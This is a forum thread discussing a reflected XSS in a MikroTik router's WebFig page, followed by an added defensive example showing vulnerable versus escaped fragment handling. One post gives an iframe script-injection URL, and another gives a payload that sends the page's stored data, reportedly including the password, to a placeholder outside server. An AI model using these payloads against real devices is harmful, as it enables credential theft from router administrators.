hey guys
is this serious?
is my router vulnerable? can not repeat it myself tho…
This is not a vulnerability
How will you make the router admin open such a malicious link with some code after the URL?
If you can do that, you can also make him type “system reset” in the console. Just have to be very convincing. And the admin has to be very naive too.
Sure, your malicious email to the router admin could be convincing enough, and he could open this URL, and receive a message in his browser. But this will not affect the router. The code executes in the browser.
Anyway, it is easier to just send some virus to the admin.
You know how some shady ad sites redirect to malware, offer exe downloads, “pdfs with surprise” for vulnerable viewers, and such? What prevents them from doing something like this:
<iframe src="http://192.168.88.1/webfig/#%22%3E%3Cscript%3Ealert%28%22XSSED%20By%20Nassim%20Asrir%22%29;%3C/script%3E"></iframe>
With the right JavaScript, it could do some damage.
To your PC, not the router. Many things can do damage to your PC.
The bad thing here is that the script written in the URL executes in the context of the WebFig page. So if I append this:
#"><script>var xhr=new XMLHttpRequest();xhr.open("GET","http://other.server.tld/?sysres="+encodeURIComponent(JSON.stringify(window.parent.sysres)));xhr.send();</script>
I get some interesting info (password, …) sent to http://other.server.tld.
The good news is that it can’t be used as I thought. Such a thing would be a major problem for a regular website where you log in and stay logged in even when you open it again in a new window or frame (in the same browser). But you can’t (it seems) do that with WebFig; opening http:///webfig/ again in a new window or frame requires you to log in again, even though you’re already logged in in the previous window. So while it technically is a vulnerability, it should not be dangerous at all.
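
Added example, not part of the thread and not WebFig's code: a sketch of the page-side flaw the posts describe (a URL fragment ending up in markup unescaped) next to a hardened form. The function names, the `<a>` template and the view-name allow-list are assumptions made for illustration; the sample URL is the alert one quoted above.

```javascript
// Added example: hypothetical page code, NOT WebFig's actual source.
// Constructed sample input: the alert() URL quoted in the thread.
const SAMPLE_URL = 'http://192.168.88.1/webfig/' +
  '#%22%3E%3Cscript%3Ealert%28%22XSSED%20By%20Nassim%20Asrir%22%29;%3C/script%3E';

// What page script sees after reading and decoding location.hash.
function fragmentOf(url) {
  return decodeURIComponent(new URL(url).hash.slice(1));
}

// Vulnerable pattern (assumed): the fragment is concatenated into markup,
// so a leading "> closes the attribute and the tag, and the rest is parsed as HTML.
function renderVulnerable(fragment) {
  return '<a class="nav" href="#' + fragment + '">current view</a>';
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical allow-list: view names are short paths of letters, digits, / _ . -
const VIEW_NAME = /^[A-Za-z0-9\/_.-]{0,64}$/;

// Hardened pattern: reject anything that is not a plain view name, then
// escape on output anyway so a later change to the allow-list cannot reopen the hole.
function renderHardened(fragment) {
  const view = VIEW_NAME.test(fragment) ? fragment : '';
  return '<a class="nav" href="#' + escapeHtml(view) + '">current view</a>';
}

const injected = fragmentOf(SAMPLE_URL);
console.log('decoded fragment :', injected);
console.log('vulnerable markup:', renderVulnerable(injected));
console.log('hardened markup  :', renderHardened(injected));
console.log('escape only      :', escapeHtml(injected));
```

The fragment is never sent to the server in the HTTP request, so this kind of input cannot be filtered server-side or seen in access logs; the check has to live in the page script that reads it.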